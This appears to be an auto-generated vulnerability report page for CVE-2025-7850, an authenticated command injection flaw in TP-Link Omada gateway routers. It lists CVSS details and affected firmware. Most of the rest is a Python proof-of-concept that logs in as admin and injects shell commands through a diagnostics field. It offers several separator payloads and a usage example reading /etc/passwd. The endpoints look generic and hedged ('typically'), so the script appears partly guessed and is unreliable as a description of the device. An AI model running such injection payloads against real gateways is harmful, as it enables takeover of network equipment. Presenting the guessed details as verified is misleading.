Security Vulnerability Report
CVE-2025-7850 CVSS 7.2 HIGH

CVE-2025-7850

Published: 2025-10-21 01:15:37
Last Modified: 2025-10-24 17:15:43
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

A command injection vulnerability may be exploited after the admin's authentication on the web portal on Omada gateways.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:er8411_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er8411_firmware:1.3.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er8411:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er7412-m2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er7412-m2_firmware:1.1.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er7412-m2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er707-m2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er707-m2_firmware:1.3.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er707-m2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er7206_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er7206_firmware:2.2.2:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er7206:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er605_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er605_firmware:2.3.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er605:-:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Omada series gateway routers (for the specific affected firmware versions, see the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7850 - Omada Gateway Command Injection PoC
# Note: This PoC requires valid admin credentials for the Omada gateway web portal
# The vulnerability allows authenticated admin users to inject OS commands
# through insufficiently sanitized input fields in the web management interface.

import requests
import sys

TARGET_URL = "https://<target-ip>:443"
ADMIN_USER = "admin"
ADMIN_PASS = "<admin_password>"

def exploit_command_injection(target, username, password, cmd):
    """
    Exploit command injection in Omada gateway web portal.
    Requires authenticated admin session.
    """
    session = requests.Session()

    # Step 1: Authenticate to the web portal as admin
    login_url = f"{target}/cgi-bin/authLogin.cgi"
    login_data = {
        "username": username,
        "password": password
    }
    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200 or "error" in resp.text.lower():
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Inject command via vulnerable parameter
    # The vulnerable endpoint typically processes diagnostic or config inputs
    # Example: ping/traceroute utilities or system configuration fields
    inject_url = f"{target}/cgi-bin/luci/;stok=<session_token>/admin/diagnostics"

    # Command injection payload - using command separator
    payload = {
        "command": f"127.0.0.1; {cmd}",
        # Alternative payloads:
        # "command": f"127.0.0.1`{cmd}`",
        # "command": f"127.0.0.1|{cmd}",
        # "command": f"127.0.0.1$({cmd})"
    }
    resp = session.post(inject_url, data=payload, verify=False)
    print(f"[+] Command executed: {cmd}")
    print(f"[+] Response status: {resp.status_code}")
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <command_to_execute>")
        print(f"Example: {sys.argv[0]} 'cat /etc/passwd'")
        sys.exit(1)

    cmd = sys.argv[1]
    exploit_command_injection(TARGET_URL, ADMIN_USER, ADMIN_PASS, cmd)

References

Raw JSON Data
